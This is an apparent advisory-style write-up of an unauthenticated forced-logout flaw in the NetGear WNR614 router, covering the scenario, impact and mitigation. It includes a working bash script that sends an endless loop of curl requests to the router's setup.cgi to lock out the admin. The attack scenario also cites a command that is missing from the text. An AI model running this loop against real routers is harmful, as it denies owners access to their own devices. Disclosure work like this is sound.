PSV-2018-0182: NetGear WNR614 WiFi Home Router Unauthenticated Remote Admin Forcibly Logout

.

Introduction

NetGear is a well-known name in the networking industry, providing a range of WiFi routers for homes and small businesses. One of the famous models from NetGear is the WNR614 WiFi Home Router. In this article, we’ll look at a vulnerability discovered in the WNR614 router, which allows an attacker to forcibly log out an authenticated user on the router’s administration panel. This vulnerability is known as the “Admin Kick-Out Exploit”.

Vulnerability Description

The vulnerability lies in the way the router handles user authentication. If any user logs in to the router’s administration panel, an attacker can forcibly log out that user by sending a simple GET request to the router. The request doesn’t require any authentication and can be performed repeatedly, preventing the user from accessing the router’s administration panel. The vulnerability is present in firmware version V1.1.0.32_1.0.1 of the WNR614 router.

Attack Scenario

Let’s consider a scenario where the router IP is 10.22.1.1, the victim’s IP is 10.22.1.6 (logged in on the WiFi administration panel), and the attacker’s IP is 10.22.1.7 (running Linux OS).

  1. The victim logs in to the router’s administration panel.
  2. The attacker sends a GET request to the router. The request can be sent using the following command:
  3. The victim is automatically logged out from the router’s administration panel.

Script

A simple script in bash can be used to perform the attack repeatedly:

#!/bin/bash
for (( ; ; ))
do
   curl -X GET "http://10.22.1.1/setup.cgi?todo=login&this_file=multi_login.html"
done

Impact

This vulnerability has a significant impact on the security of the router. An attacker can send this request repeatedly, making it impossible for the user to access the router’s administration panel. This can be a major inconvenience for the user and can also be used as a Denial of Service (DoS) attack.

Mitigation

NetGear should release a firmware update to address this vulnerability and prevent such attacks. Until then, users of the WNR614 router should be cautious when logging in to the router’s administration panel and should use a secure network.

Conclusion

In conclusion, the Admin Kick-Out exploit is a serious vulnerability in the NetGear WNR614 router that can prevent users from accessing the router’s administration panel. NetGear should take the necessary steps to address this issue and prevent such attacks. As a user, it is important to be aware of such vulnerabilities and take the necessary precautions to secure your network.

Leave a Reply